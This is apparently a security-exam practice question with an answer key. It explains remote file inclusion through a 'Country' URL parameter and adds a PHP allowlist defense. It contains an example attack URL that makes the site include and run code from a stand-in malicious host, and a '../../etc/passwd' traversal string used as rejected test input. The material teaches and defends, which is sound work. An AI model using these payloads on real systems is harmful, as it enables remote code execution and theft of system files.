Which of the following vulnerabilities would MOST likely affect this site?

A security engineer notices the company website allows users following example: https://mycompany.com/main.php?Country=US

Which of the following vulnerabilities would MOST likely affect this site?
A. SQL injection
B. Remote file inclusion
C. Directory traversal
D. Unsecure references

Answer: B

Explanation:

Remote file inclusion (RFI) is a web vulnerability that allows an attacker to include malicious external files that are later run by the website or web application. This can lead to code execution, data theft, defacement, or other malicious actions. RFI typically occurs when a web application dynamically references external scripts using user-supplied input without proper validation or sanitization.

In this case, the website allows users to specify a country parameter in the URL that is used to include a file from another domain. For example, an attacker could craft a URL like this:

https://mycompany.com/main.php?Country=https://malicious.com/evil.php

This would cause the website to include and execute the evil.php file from the malicious domain, which could contain any arbitrary code.
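
As an added example (not part of the original question or its explanation), here is one way a `main.php` handler could resolve the `Country` parameter through an allowlist so the raw value never reaches `include`. The file names, the `countries` directory, and the `resolveCountryPage` function are assumptions made for illustration.

```php
<?php
// Added example: hypothetical main.php logic; file names and directory are assumptions.

// Vulnerable pattern described in the explanation (kept as a comment so it never runs):
//   include $_GET['Country'];   // user-controlled path or URL reaches include

// Allowlist: each accepted Country value maps to a fixed local file name.
const COUNTRY_PAGES = [
    'US' => 'us.php',
    'CA' => 'ca.php',
    'GB' => 'gb.php',
];

/**
 * Resolve a Country parameter to a local include path, or null if rejected.
 * The user-supplied value is only ever used as a lookup key, never as a path.
 */
function resolveCountryPage($country, string $baseDir): ?string
{
    // Reject arrays (?Country[]=x) and anything that is not an exact allowlist key.
    if (!is_string($country) || !array_key_exists($country, COUNTRY_PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . COUNTRY_PAGES[$country];
}

// Constructed sample inputs: one legitimate value and values that must be refused.
$samples = ['US', 'https://malicious.com/evil.php', '../../etc/passwd', 'us', ['US']];
foreach ($samples as $input) {
    $path  = resolveCountryPage($input, __DIR__ . '/countries');
    $label = is_array($input) ? '(array)' : $input;
    echo str_pad($label, 34), ' => ', $path ?? 'REJECTED (respond 400)', PHP_EOL;
    // In main.php: if ($path !== null) { include $path; } else { http_response_code(400); }
}

// Defense in depth: keep allow_url_include = Off in php.ini so include/require
// cannot load http:// or https:// URLs even if a code path is missed.
```

Only the exact key `US` resolves to a path; the remote URL, the traversal string, the wrong-case value, and the array form are all rejected before any file is included.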
